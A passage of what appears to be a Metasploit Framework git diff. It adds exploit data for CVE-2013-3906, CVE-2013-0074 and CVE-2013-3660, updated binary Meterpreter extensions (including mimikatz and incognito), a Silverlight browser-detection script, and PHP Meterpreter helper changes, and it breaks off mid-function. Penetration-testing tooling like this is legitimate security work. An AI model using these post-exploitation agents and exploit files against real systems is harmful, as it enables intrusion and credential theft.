diff --git a/.gitmodules b/.gitmodules new file mode 100644 index 0000000000..564edab544 --- /dev/null +++ b/.gitmodules @@ -0,0 +1,3 @@ +[submodule "external/source/ReflectiveDLLInjection"] + path = external/source/ReflectiveDLLInjection + url = https://github.com/rapid7/ReflectiveDLLInjection.git diff --git a/.mailmap b/.mailmap index 2901c8bc5c..459d4a064e 100644 --- a/.mailmap +++ b/.mailmap @@ -20,7 +20,7 @@ wchen-r7 sinn3r # aka sinn3r wchen-r7 sinn3r wchen-r7 Wei Chen wvu-r7 William Vu -wvu-r7 William Vu +wvu-r7 William Vu # Above this line are current Rapid7 employees. Below this paragraph are # volunteers, former employees, and potential Rapid7 employees who, at @@ -40,8 +40,8 @@ Chao-mu chao-mu Chao-mu chao-mu ChrisJohnRiley Chris John Riley ChrisJohnRiley Chris John Riley -corelanc0d3er corelanc0d3r -corelanc0d3er Peter Van Eeckhoutte (corelanc0d3r) +corelanc0d3r corelanc0d3r +corelanc0d3r Peter Van Eeckhoutte (corelanc0d3r) darkoperator Carlos Perez efraintorres efraintorres efraintorres et <> diff --git a/.ruby-version b/.ruby-version index c82eec79ee..7a895c2142 100644 --- a/.ruby-version +++ b/.ruby-version @@ -1 +1 @@ -1.9.3-p448 +1.9.3-p484 diff --git a/Gemfile b/Gemfile index 0f0282ae07..26b450c436 100755 --- a/Gemfile +++ b/Gemfile @@ -14,50 +14,50 @@ gem 'robots' gem 'packetfu', '1.1.9' group :db do - # Needed for Msf::DbManager - gem 'activerecord' - # Database models shared between framework and Pro. - gem 'metasploit_data_models', '~> 0.16.6' - # Needed for module caching in Mdm::ModuleDetails - gem 'pg', '>= 0.11' + # Needed for Msf::DbManager + gem 'activerecord' + # Database models shared between framework and Pro. + gem 'metasploit_data_models', '~> 0.16.6' + # Needed for module caching in Mdm::ModuleDetails + gem 'pg', '>= 0.11' end group :pcap do gem 'network_interface', '~> 0.0.1' - # For sniffer and raw socket modules - gem 'pcaprub' + # For sniffer and raw socket modules + gem 'pcaprub' end group :development do - # Markdown formatting for yard - gem 'redcarpet' - # generating documentation - gem 'yard' + # Markdown formatting for yard + gem 'redcarpet' + # generating documentation + gem 'yard' end group :development, :test do - # supplies factories for producing model instance for specs - # Version 4.1.0 or newer is needed to support generate calls without the - # 'FactoryGirl.' in factory definitions syntax. - gem 'factory_girl', '>= 4.1.0' -# Make rspec output shorter and more useful - gem 'fivemat', '1.2.1' - # running documentation generation tasks and rspec tasks - gem 'rake', '>= 10.0.0' + # supplies factories for producing model instance for specs + # Version 4.1.0 or newer is needed to support generate calls without the + # 'FactoryGirl.' in factory definitions syntax. + gem 'factory_girl', '>= 4.1.0' + # Make rspec output shorter and more useful + gem 'fivemat', '1.2.1' + # running documentation generation tasks and rspec tasks + gem 'rake', '>= 10.0.0' end group :test do - # Removes records from database created during tests. Can't use rspec-rails' - # transactional fixtures because multiple connections are in use so - # transactions won't work. - gem 'database_cleaner' - # testing framework - gem 'rspec', '>= 2.12' - gem 'shoulda-matchers' - # code coverage for tests - # any version newer than 0.5.4 gives an Encoding error when trying to read the source files. - # see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0) - gem 'simplecov', '0.5.4', :require => false - # Manipulate Time.now in specs - gem 'timecop' + # Removes records from database created during tests. Can't use rspec-rails' + # transactional fixtures because multiple connections are in use so + # transactions won't work. + gem 'database_cleaner' + # testing framework + gem 'rspec', '>= 2.12' + gem 'shoulda-matchers' + # code coverage for tests + # any version newer than 0.5.4 gives an Encoding error when trying to read the source files. + # see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0) + gem 'simplecov', '0.5.4', :require => false + # Manipulate Time.now in specs + gem 'timecop' end diff --git a/data/exploits/CVE-2013-3906/_rels/.rels b/data/exploits/CVE-2013-3906/_rels/.rels new file mode 100755 index 0000000000..bf27b7dd5f --- /dev/null +++ b/data/exploits/CVE-2013-3906/_rels/.rels @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/docProps/app.xml b/data/exploits/CVE-2013-3906/docProps/app.xml new file mode 100755 index 0000000000..fda5bfdf05 --- /dev/null +++ b/data/exploits/CVE-2013-3906/docProps/app.xml @@ -0,0 +1,19 @@ + + + +4 +1 +217 +1238 +Microsoft Office Word +0 +10 +2 +false +home +false +1453 +false +false +12.0000 + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/docProps/core.xml b/data/exploits/CVE-2013-3906/docProps/core.xml new file mode 100755 index 0000000000..d1b1819ff6 --- /dev/null +++ b/data/exploits/CVE-2013-3906/docProps/core.xml @@ -0,0 +1,8 @@ + + +Win7 +Win7 +1 +2013-10-03T22:46:00Z +2013-10-03T23:17:00Z + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/_rels/chart1.xml.rels b/data/exploits/CVE-2013-3906/word/charts/_rels/chart1.xml.rels new file mode 100755 index 0000000000..eccb5ced00 --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/_rels/chart1.xml.rels @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/_rels/chart2.xml.rels b/data/exploits/CVE-2013-3906/word/charts/_rels/chart2.xml.rels new file mode 100755 index 0000000000..99575aefc3 --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/_rels/chart2.xml.rels @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/_rels/chart3.xml.rels b/data/exploits/CVE-2013-3906/word/charts/_rels/chart3.xml.rels new file mode 100755 index 0000000000..1ed09c997d --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/_rels/chart3.xml.rels @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/_rels/chart4.xml.rels b/data/exploits/CVE-2013-3906/word/charts/_rels/chart4.xml.rels new file mode 100755 index 0000000000..da6e235036 --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/_rels/chart4.xml.rels @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/_rels/chart5.xml.rels b/data/exploits/CVE-2013-3906/word/charts/_rels/chart5.xml.rels new file mode 100755 index 0000000000..de95b488db --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/_rels/chart5.xml.rels @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/_rels/chart6.xml.rels b/data/exploits/CVE-2013-3906/word/charts/_rels/chart6.xml.rels new file mode 100755 index 0000000000..8bbd9603de --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/_rels/chart6.xml.rels @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/chart1.xml b/data/exploits/CVE-2013-3906/word/charts/chart1.xml new file mode 100755 index 0000000000..22a44c771d --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/chart1.xml @@ -0,0 +1,230 @@ + + + + + + + + + + + + + + + + + +Sheet1!$B$1 + + + +Series 1 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$B$2:$B$5 + +General + + +4.3 + + +2.5 + + +3.5 + + +4.5 + + + + + + + + + + +Sheet1!$C$1 + + + +Series 2 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$C$2:$C$5 + +General + + +2.4 + + +4.4000000000000004 + + +1.8 + + +2.8 + + + + + + + + + + +Sheet1!$D$1 + + + +Series 3 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$D$2:$D$5 + +General + + +2 + + +2 + + +3 + + +5 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/chart2.xml b/data/exploits/CVE-2013-3906/word/charts/chart2.xml new file mode 100755 index 0000000000..cafdd358c1 --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/chart2.xml @@ -0,0 +1,220 @@ + + + + + + + + + + + + + + + + + +Sheet1!$B$1 + + + +Series 1 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$B$2:$B$5 + +General + + +4.3 + + +2.5 + + +3.5 + + +4.5 + + + + + + + + + + +Sheet1!$C$1 + + + +Series 2 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$C$2:$C$5 + +General + + +2.4 + + +4.4000000000000004 + + +1.8 + + +2.8 + + + + + + + + + + +Sheet1!$D$1 + + + +Series 3 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$D$2:$D$5 + +General + + +2 + + +2 + + +3 + + +5 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/chart3.xml b/data/exploits/CVE-2013-3906/word/charts/chart3.xml new file mode 100755 index 0000000000..0b4c47a1a9 --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/chart3.xml @@ -0,0 +1,230 @@ + + + + + + + + + + + + + + + + + +Sheet1!$B$1 + + + +Series 1 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$B$2:$B$5 + +General + + +4.3 + + +2.5 + + +3.5 + + +4.5 + + + + + + + + + + +Sheet1!$C$1 + + + +Series 2 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$C$2:$C$5 + +General + + +2.4 + + +4.4000000000000004 + + +1.8 + + +2.8 + + + + + + + + + + +Sheet1!$D$1 + + + +Series 3 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$D$2:$D$5 + +General + + +2 + + +2 + + +3 + + +5 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/chart4.xml b/data/exploits/CVE-2013-3906/word/charts/chart4.xml new file mode 100755 index 0000000000..da8085b066 --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/chart4.xml @@ -0,0 +1,110 @@ + + + + + + + + + + + + + + + + + + + + + +Sheet1!$B$1 + + + +Sales + + + + + + +Sheet1!$A$2:$A$5 + + + +Sq.. 1 + + +Sq.. 2 + + +Sq.. 3 + + +Sq.. 4 + + + + + + +Sheet1!$B$2:$B$5 + +General + + +8.1999999999999993 + + +3.2 + + +1.4 + + +1.2 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/chart5.xml b/data/exploits/CVE-2013-3906/word/charts/chart5.xml new file mode 100755 index 0000000000..061cf33531 --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/chart5.xml @@ -0,0 +1,228 @@ + + + + + + + + + + + + + + + + +Sheet1!$B$1 + + + +Series 1 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$B$2:$B$5 + +General + + +4.3 + + +2.5 + + +3.5 + + +4.5 + + + + + + + + + + +Sheet1!$C$1 + + + +Series 2 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$C$2:$C$5 + +General + + +2.4 + + +4.4000000000000004 + + +1.8 + + +2.8 + + + + + + + + + + +Sheet1!$D$1 + + + +Series 3 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$D$2:$D$5 + +General + + +2 + + +2 + + +3 + + +5 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/charts/chart6.xml b/data/exploits/CVE-2013-3906/word/charts/chart6.xml new file mode 100755 index 0000000000..63ca82beda --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/charts/chart6.xml @@ -0,0 +1,238 @@ + + + + + + + + + + + + + + + +Sheet1!$B$1 + + + +Series 1 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$B$2:$B$5 + +General + + +4.3 + + +2.5 + + +3.5 + + +4.5 + + + + + + + + + + +Sheet1!$C$1 + + + +Series 2 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$C$2:$C$5 + +General + + +2.4 + + +4.4000000000000004 + + +1.8 + + +2.8 + + + + + + + + + + +Sheet1!$D$1 + + + +Series 3 + + + + + + +Sheet1!$A$2:$A$5 + + + +Category 1 + + +Category 2 + + +Category 3 + + +Category 4 + + + + + + +Sheet1!$D$2:$D$5 + +General + + +2 + + +2 + + +3 + + +5 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet1.xlsx b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet1.xlsx new file mode 100755 index 0000000000..73575cba24 Binary files /dev/null and b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet1.xlsx differ diff --git a/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet2.xlsx b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet2.xlsx new file mode 100755 index 0000000000..9ff454e76f Binary files /dev/null and b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet2.xlsx differ diff --git a/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet3.xlsx b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet3.xlsx new file mode 100755 index 0000000000..47c4681188 Binary files /dev/null and b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet3.xlsx differ diff --git a/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet4.xlsx b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet4.xlsx new file mode 100755 index 0000000000..30b4817db4 Binary files /dev/null and b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet4.xlsx differ diff --git a/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet5.xlsx b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet5.xlsx new file mode 100755 index 0000000000..60bfccf3c6 Binary files /dev/null and b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet5.xlsx differ diff --git a/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet6.xlsx b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet6.xlsx new file mode 100755 index 0000000000..e74fe9072f Binary files /dev/null and b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet6.xlsx differ diff --git a/data/exploits/CVE-2013-3906/word/fontTable.xml b/data/exploits/CVE-2013-3906/word/fontTable.xml new file mode 100755 index 0000000000..06076bd466 --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/fontTable.xml @@ -0,0 +1,31 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/media/image1.jpeg b/data/exploits/CVE-2013-3906/word/media/image1.jpeg new file mode 100755 index 0000000000..9795917505 Binary files /dev/null and b/data/exploits/CVE-2013-3906/word/media/image1.jpeg differ diff --git a/data/exploits/CVE-2013-3906/word/settings.xml b/data/exploits/CVE-2013-3906/word/settings.xml new file mode 100755 index 0000000000..e28f493ffb --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/settings.xml @@ -0,0 +1,36 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/styles.xml b/data/exploits/CVE-2013-3906/word/styles.xml new file mode 100755 index 0000000000..b950e6138a --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/styles.xml @@ -0,0 +1,220 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/theme/theme1.xml b/data/exploits/CVE-2013-3906/word/theme/theme1.xml new file mode 100755 index 0000000000..42767537be --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/theme/theme1.xml @@ -0,0 +1,283 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/data/exploits/CVE-2013-3906/word/webSettings.xml b/data/exploits/CVE-2013-3906/word/webSettings.xml new file mode 100755 index 0000000000..c57f94f356 --- /dev/null +++ b/data/exploits/CVE-2013-3906/word/webSettings.xml @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/data/exploits/cve-2013-0074/SilverApp1.dll b/data/exploits/cve-2013-0074/SilverApp1.dll new file mode 100755 index 0000000000..87ea67ba4b Binary files /dev/null and b/data/exploits/cve-2013-0074/SilverApp1.dll differ diff --git a/data/exploits/cve-2013-0074/SilverApp1.xap b/data/exploits/cve-2013-0074/SilverApp1.xap new file mode 100755 index 0000000000..77907f982f Binary files /dev/null and b/data/exploits/cve-2013-0074/SilverApp1.xap differ diff --git a/data/exploits/cve-2013-3660/exploit.dll b/data/exploits/cve-2013-3660/exploit.dll deleted file mode 100755 index cbb761b568..0000000000 Binary files a/data/exploits/cve-2013-3660/exploit.dll and /dev/null differ diff --git a/data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll b/data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll new file mode 100755 index 0000000000..888d31339a Binary files /dev/null and b/data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll differ diff --git a/data/js/detect/misc_addons.js b/data/js/detect/misc_addons.js index 434a145791..2deaed1252 100644 --- a/data/js/detect/misc_addons.js +++ b/data/js/detect/misc_addons.js @@ -1,5 +1,51 @@ window.misc_addons_detect = { }; + +/** + * Detects whether the browser supports Silverlight or not + **/ +window.misc_addons_detect.hasSilverlight = function () { + var found = false; + + // + // When on IE, we can use AgControl.AgControl to actually detect the version too. + // But this ability is specific to IE, so we fall back to just true/false response + // + try { + var ax = new ActiveXObject('AgControl.AgControl'); + found = true; + } catch(e) {} + + // + // ActiveX didn't get anything, try looking in MIMEs + // + if (!found) { + var mimes = window.navigator.mimeTypes; + for (var i=0; i < mimes.length; i++) { + if (/x\-silverlight/.test(mimes[i].type)) { + found = true; + break; + } + } + } + + // + // MIMEs didn't work either. Try navigator. + // + if (!found) { + var count = navigator.plugins.length; + for (var i=0; i < count; i++) { + var pluginName = navigator.plugins[i].name; + if (/Silverlight Plug\-In/.test(pluginName)) { + found = true; + break; + } + } + } + + return found; +} + /** * Returns the Java version **/ diff --git a/data/meterpreter/elevator.x64.dll b/data/meterpreter/elevator.x64.dll index 201d39a28c..6122e0d4ec 100755 Binary files a/data/meterpreter/elevator.x64.dll and b/data/meterpreter/elevator.x64.dll differ diff --git a/data/meterpreter/elevator.x86.dll b/data/meterpreter/elevator.x86.dll index 1aa9edd055..4b377f7577 100755 Binary files a/data/meterpreter/elevator.x86.dll and b/data/meterpreter/elevator.x86.dll differ diff --git a/data/meterpreter/ext_server_espia.x64.dll b/data/meterpreter/ext_server_espia.x64.dll index c798efbea9..36bd78ef87 100755 Binary files a/data/meterpreter/ext_server_espia.x64.dll and b/data/meterpreter/ext_server_espia.x64.dll differ diff --git a/data/meterpreter/ext_server_espia.x86.dll b/data/meterpreter/ext_server_espia.x86.dll index 1c5473b0c5..8608ac3cb5 100755 Binary files a/data/meterpreter/ext_server_espia.x86.dll and b/data/meterpreter/ext_server_espia.x86.dll differ diff --git a/data/meterpreter/ext_server_incognito.x64.dll b/data/meterpreter/ext_server_incognito.x64.dll index ac4c0671b2..777f6c3682 100755 Binary files a/data/meterpreter/ext_server_incognito.x64.dll and b/data/meterpreter/ext_server_incognito.x64.dll differ diff --git a/data/meterpreter/ext_server_incognito.x86.dll b/data/meterpreter/ext_server_incognito.x86.dll index e4abf8f237..7369f7621a 100755 Binary files a/data/meterpreter/ext_server_incognito.x86.dll and b/data/meterpreter/ext_server_incognito.x86.dll differ diff --git a/data/meterpreter/ext_server_lanattacks.x64.dll b/data/meterpreter/ext_server_lanattacks.x64.dll index fa11081c3c..4042a413f1 100755 Binary files a/data/meterpreter/ext_server_lanattacks.x64.dll and b/data/meterpreter/ext_server_lanattacks.x64.dll differ diff --git a/data/meterpreter/ext_server_lanattacks.x86.dll b/data/meterpreter/ext_server_lanattacks.x86.dll index 0cb0d5d11d..372df0a5fa 100755 Binary files a/data/meterpreter/ext_server_lanattacks.x86.dll and b/data/meterpreter/ext_server_lanattacks.x86.dll differ diff --git a/data/meterpreter/ext_server_mimikatz.x64.dll b/data/meterpreter/ext_server_mimikatz.x64.dll index e31ae790f5..09ec5e887b 100755 Binary files a/data/meterpreter/ext_server_mimikatz.x64.dll and b/data/meterpreter/ext_server_mimikatz.x64.dll differ diff --git a/data/meterpreter/ext_server_mimikatz.x86.dll b/data/meterpreter/ext_server_mimikatz.x86.dll index 4bb55fe627..d0c6b54447 100755 Binary files a/data/meterpreter/ext_server_mimikatz.x86.dll and b/data/meterpreter/ext_server_mimikatz.x86.dll differ diff --git a/data/meterpreter/ext_server_priv.x64.dll b/data/meterpreter/ext_server_priv.x64.dll index ecaa7f4867..cbdbd29fab 100755 Binary files a/data/meterpreter/ext_server_priv.x64.dll and b/data/meterpreter/ext_server_priv.x64.dll differ diff --git a/data/meterpreter/ext_server_priv.x86.dll b/data/meterpreter/ext_server_priv.x86.dll index f23d16c37c..7471006016 100755 Binary files a/data/meterpreter/ext_server_priv.x86.dll and b/data/meterpreter/ext_server_priv.x86.dll differ diff --git a/data/meterpreter/ext_server_sniffer.x64.dll b/data/meterpreter/ext_server_sniffer.x64.dll index 25ca00b2e4..5008d8d9d6 100755 Binary files a/data/meterpreter/ext_server_sniffer.x64.dll and b/data/meterpreter/ext_server_sniffer.x64.dll differ diff --git a/data/meterpreter/ext_server_sniffer.x86.dll b/data/meterpreter/ext_server_sniffer.x86.dll index c2a49293ac..d64f9085a7 100755 Binary files a/data/meterpreter/ext_server_sniffer.x86.dll and b/data/meterpreter/ext_server_sniffer.x86.dll differ diff --git a/data/meterpreter/ext_server_stdapi.php b/data/meterpreter/ext_server_stdapi.php index 4a7df401e6..20cbc03793 100755 --- a/data/meterpreter/ext_server_stdapi.php +++ b/data/meterpreter/ext_server_stdapi.php @@ -78,6 +78,14 @@ define("TLV_TYPE_VALUE_DATA", TLV_META_TYPE_RAW | 1012); define("TLV_TYPE_COMPUTER_NAME", TLV_META_TYPE_STRING | 1040); define("TLV_TYPE_OS_NAME", TLV_META_TYPE_STRING | 1041); define("TLV_TYPE_USER_NAME", TLV_META_TYPE_STRING | 1042); +define("TLV_TYPE_ARCHITECTURE", TLV_META_TYPE_STRING | 1043); +define("TLV_TYPE_LANG_SYSTEM", TLV_META_TYPE_STRING | 1044); + +# Environment +define("TLV_TYPE_ENV_VARIABLE", TLV_META_TYPE_STRING | 1100); +define("TLV_TYPE_ENV_VALUE", TLV_META_TYPE_STRING | 1101); +define("TLV_TYPE_ENV_GROUP", TLV_META_TYPE_GROUP | 1102); + define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0)); @@ -162,7 +170,7 @@ define("ERROR_CONNECTION_ERROR", 10000); # eval'd twice my_print("Evaling stdapi"); -## +## # Search Helpers ## @@ -197,38 +205,38 @@ define('GLOB_RECURSE',2048); */ if (!function_exists('safe_glob')) { function safe_glob($pattern, $flags=0) { - $split=explode('/',str_replace('\\','/',$pattern)); - $mask=array_pop($split); - $path=implode('/',$split); - if (($dir=opendir($path))!==false) { - $glob=array(); - while (($file=readdir($dir))!==false) { - // Recurse subdirectories (GLOB_RECURSE) - if ( - ( - $flags&GLOB_RECURSE) && is_dir($path."/".$file) - && (!in_array($file,array('.','..')) - # don't follow links to avoid infinite recursion - && (!is_link($path."/".$file)) - ) - ) { - $glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags), - ($flags&GLOB_PATH?'':$file.'/'))); + $split=explode('/',str_replace('\\','/',$pattern)); + $mask=array_pop($split); + $path=implode('/',$split); + if (($dir=opendir($path))!==false) { + $glob=array(); + while (($file=readdir($dir))!==false) { + // Recurse subdirectories (GLOB_RECURSE) + if ( + ( + $flags&GLOB_RECURSE) && is_dir($path."/".$file) + && (!in_array($file,array('.','..')) + # don't follow links to avoid infinite recursion + && (!is_link($path."/".$file)) + ) + ) { + $glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags), + ($flags&GLOB_PATH?'':$file.'/'))); } - // Match file mask - if (fnmatch($mask,$file)) { - if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") ) - && ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) ) - && ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) ) - $glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':''); - } - } - closedir($dir); - if (!($flags&GLOB_NOSORT)) sort($glob); - return $glob; - } else { - return false; - } + // Match file mask + if (fnmatch($mask,$file)) { + if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") ) + && ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) ) + && ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) ) + $glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':''); + } + } + closedir($dir); + if (!($flags&GLOB_NOSORT)) sort($glob); + return $glob; + } else { + return false; + } } } /** @@ -239,7 +247,7 @@ function safe_glob($pattern, $flags=0) { */ if (!function_exists('fnmatch')) { function fnmatch($pattern, $string) { - return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string); + return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string); } } @@ -261,7 +269,7 @@ function array_prepend($array, $string, $deep=false) { else $array[$key] = $string.$element; return $array; - + } } @@ -519,13 +527,13 @@ function stdapi_fs_md5($req, &$pkt) { $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH); $path = cononicalize_path($path_tlv['value']); - if (is_callable("md5_file")) { - $md5 = md5_file($path); - } else { - $md5 = md5(file_get_contents($path)); - } - $md5 = pack("H*", $md5); - # Ghetto abuse of file name type to indicate the md5 result + if (is_callable("md5_file")) { + $md5 = md5_file($path); + } else { + $md5 = md5(file_get_contents($path)); + } + $md5 = pack("H*", $md5); + # Ghetto abuse of file name type to indicate the md5 result packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $md5)); return ERROR_SUCCESS; } @@ -538,13 +546,13 @@ function stdapi_fs_sha1($req, &$pkt) { $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH); $path = cononicalize_path($path_tlv['value']); - if (is_callable("sha1_file")) { - $sha1 = sha1_file($path); - } else { - $sha1 = sha1(file_get_contents($path)); - } - $sha1 = pack("H*", $sha1); - # Ghetto abuse of file name type to indicate the sha1 result + if (is_callable("sha1_file")) { + $sha1 = sha1_file($path); + } else { + $sha1 = sha1(file_get_contents($path)); + } + $sha1 = pack("H*", $sha1); + # Ghetto abuse of file name type to indicate the sha1 result packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $sha1)); return ERROR_SUCCESS; } @@ -573,6 +581,41 @@ function stdapi_sys_config_getuid($req, &$pkt) { } } +if (!function_exists('stdapi_sys_config_getenv')) { +register_command('stdapi_sys_config_getenv'); +function 